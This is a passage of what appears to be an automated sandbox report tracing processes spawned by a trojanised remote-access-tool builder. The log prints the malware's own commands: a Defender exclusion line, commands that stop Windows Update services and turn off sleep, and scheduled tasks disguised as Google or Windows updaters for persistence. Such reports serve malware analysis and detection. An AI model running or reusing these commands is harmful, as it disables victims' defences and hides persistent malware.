AtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAagBjAHUAIwA+AA=="4⤵
- Blocklisted process makes network request
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1096
-
-
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:440
-
-
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe"C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe"5⤵
- Executes dropped EXE
PID:3512
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵PID:2124
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc3⤵PID:3140
-
C:\Windows\System32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:640
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3704
-
-
C:\Windows\System32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:2520
-
-
C:\Windows\System32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\System32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:3880
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:3180
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:2772
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:772
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:3668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:3468
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe3⤵PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }3⤵
- Drops file in System32 directory
PID:3844
-
-
C:\Windows\system32\certreq.exe"C:\Windows\system32\certreq.exe"3⤵PID:3448
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineTCP"3⤵PID:1856
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 632 -s 8362⤵
- Program crash
PID:1604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1176
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2736
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2736 -s 15843⤵
- Program crash
PID:4604
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1072
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1924
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f8 0x2f42⤵PID:3136
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:1372
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1648
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:1644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:1700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1952
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3576
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3576 -s 9922⤵
- Program crash
PID:2756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22319758,0x7ffe22319768,0x7ffe223197782⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:22⤵PID:2544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:1732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3636 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4648 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3936 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5736 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:1156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:4808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5220 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2424 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:2724
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2664
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1460
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4560
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3092
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:4736
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1712
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1876
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3288
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1348
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:896
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2744
-
C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe"C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe"1⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1668 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"3⤵
- Creates scheduled task(s)
PID:2388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat3⤵PID:1824
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1668"4⤵
- Enumerates processes with tasklist
PID:4160
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:2316
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3412
-
-
C:\Users\Static\wsappx.exe"wsappx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2576 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"5⤵
- Creates scheduled task(s)
PID:1108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1824
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2576 -s 24205⤵
- Program crash
PID:3388
-
-
-
-
-
C:\Users\Admin\Desktop\builder.exe"C:\Users\Admin\Desktop\builder.exe"2⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline"3⤵PID:4424
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP"4⤵PID:4024
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3724 -s 23322⤵
- Program crash
PID:4560
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:4720
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 404 -p 3724 -ip 37241⤵PID:5032
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2124
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 2576 -ip 25761⤵PID:396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:492
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:5084
-
C:\Users\Admin\Desktop\builder.exe"C:\Users\Admin\Desktop\builder.exe"1⤵
- Executes dropped EXE
PID:1556
-
C:\Users\Admin\Desktop\XHVNC.exe"C:\Users\Admin\Desktop\XHVNC.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1512
-
C:\Users\Admin\Desktop\XWorm.exe"C:\Users\Admin\Desktop\XWorm.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
PID:3596 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM explorer.exe2⤵
- Kills process with taskkill
PID:4192
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2920 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2920 -s 78123⤵
- Program crash
PID:3408
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:4040
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:2840
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:3564
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3848
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3848 -s 41162⤵
- Program crash
PID:2656
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:2796
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 2920 -ip 29201⤵PID:2288
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3640
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 184 -p 3848 -ip 38481⤵PID:3292
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2100 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2100 -s 35482⤵
- Program crash
PID:4732
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 2100 -ip 21001⤵PID:3500
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3596 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 35282⤵
- Program crash
PID:3488
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 488 -p 3596 -ip 35961⤵PID:4068
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:772 -
